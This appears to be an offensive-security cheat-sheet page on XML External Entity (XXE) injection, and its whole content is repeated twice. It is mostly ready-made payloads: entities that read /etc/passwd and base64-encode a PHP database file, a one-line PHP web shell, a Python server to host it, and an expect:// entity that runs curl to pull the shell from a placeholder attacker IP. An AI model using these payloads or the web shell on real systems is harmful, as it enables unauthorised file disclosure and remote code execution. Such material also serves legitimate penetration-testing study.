XML External Entity (XXE) Injection

XXE

Reading File in plain text.

<?xml  version="1.0" encoding="ISO-8859-1"?>
    <!DOCTYPE email [
        <!ENTITY leri SYSTEM "file:///etc/passwd"> 
    ]>
		<bugreport>
		<title>Random</title>
		<cwe>random</cwe>
		<cvss>random</cvss>
		<reward>&leri;</reward>
		</bugreport>

Reading in base64.

<?xml  version="1.0" encoding="ISO-8859-1"?>
    <!DOCTYPE email [
        <!ENTITY leri SYSTEM "php://filter/read=convert.base64-encode/resource=/var/www/html/db.php"> 
    ]>
		<bugreport>
		<title>Random</title>
		<cwe>random</cwe>
		<cvss>random</cvss>
		<reward>&leri;</reward>
		</bugreport>

RCE

echo '<?php system($_REQUEST["cmd"]);?>' > shell.php

sudo python3 -m http.server 80

<?xml version="1.0"?>
<!DOCTYPE email [
  <!ENTITY company SYSTEM "expect://curl$IFS-O$IFS'OUR_IP/shell.php'">
]>
<root>
<name></name>
<tel></tel>
<email>&company;</email>
<message></message>
</root>

PreviousOWASP NextHTTP Verb Tampering

Last updated 9 months ago

XML External Entity (XXE) Injection

XXE

Reading File in plain text.

<?xml  version="1.0" encoding="ISO-8859-1"?>
    <!DOCTYPE email [
        <!ENTITY leri SYSTEM "file:///etc/passwd"> 
    ]>
		<bugreport>
		<title>Random</title>
		<cwe>random</cwe>
		<cvss>random</cvss>
		<reward>&leri;</reward>
		</bugreport>

Reading in base64.

<?xml  version="1.0" encoding="ISO-8859-1"?>
    <!DOCTYPE email [
        <!ENTITY leri SYSTEM "php://filter/read=convert.base64-encode/resource=/var/www/html/db.php"> 
    ]>
		<bugreport>
		<title>Random</title>
		<cwe>random</cwe>
		<cvss>random</cvss>
		<reward>&leri;</reward>
		</bugreport>

RCE

echo '<?php system($_REQUEST["cmd"]);?>' > shell.php

sudo python3 -m http.server 80

<?xml version="1.0"?>
<!DOCTYPE email [
  <!ENTITY company SYSTEM "expect://curl$IFS-O$IFS'OUR_IP/shell.php'">
]>
<root>
<name></name>
<tel></tel>
<email>&company;</email>
<message></message>
</root>

PreviousOWASP NextHTTP Verb Tampering

Last updated 9 months ago